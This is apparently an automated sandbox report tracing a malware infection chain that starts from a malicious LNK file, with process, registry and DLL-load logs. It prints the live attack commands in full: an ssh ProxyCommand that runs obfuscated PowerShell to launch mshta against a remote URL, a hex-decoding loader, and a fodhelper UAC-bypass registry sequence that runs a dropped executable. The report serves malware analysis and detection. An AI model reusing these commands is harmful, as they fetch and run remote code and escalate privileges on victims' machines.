          Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknown | TCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: global traffic | DNS traffic detected: DNS query: pravo-bashkortostan.ru
          Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.10:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.10:49728 version: TLS 1.2

          E-Banking Fraud

          Source: Yara matchFile source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 8756, type: MEMORYSTR

          System Summary

          Source: Process Memory Space: powershell.exe PID: 180, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mama.exe
          Source: vreFmptfUu.lnkLNK file: -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" .
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_03435340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,43_2_03435340
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF7BFD40FB613_2_00007FF7BFD40FB6
          Source: mama.exe.13.drStatic PE information: Number of sections : 11 > 10
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 4181
          Source: Process Memory Space: powershell.exe PID: 180, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.evad.winLNK@78/73@4/5
          Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.ssh
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8916:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_1834116504
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8708:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8640:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwav1ubt.rpx.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Users\user\AppData\Roaming\mama.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.ini
          Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: vreFmptfUu.lnkReversingLabs: Detection: 36%
          Source: vreFmptfUu.lnkVirustotal: Detection: 39%
          Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" .
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('...
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nop
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1592,i,1127921047332727915,3798785087660649404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Users\user\AppData\Roaming\mama.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\OpenSSH\ssh.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4
          Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('[hex-encoded payload omitted; the command line is truncated in the report]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nop
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1592,i,1127921047332727915,3798785087660649404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: libcrypto.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: napinsp.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: wshbth.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: nlaapi.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: winrnr.dll
          Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: wininet.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: ieframe.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: netapi32.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: schannel.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: ntasn1.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: dpapi.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: imgutil.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: mlang.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
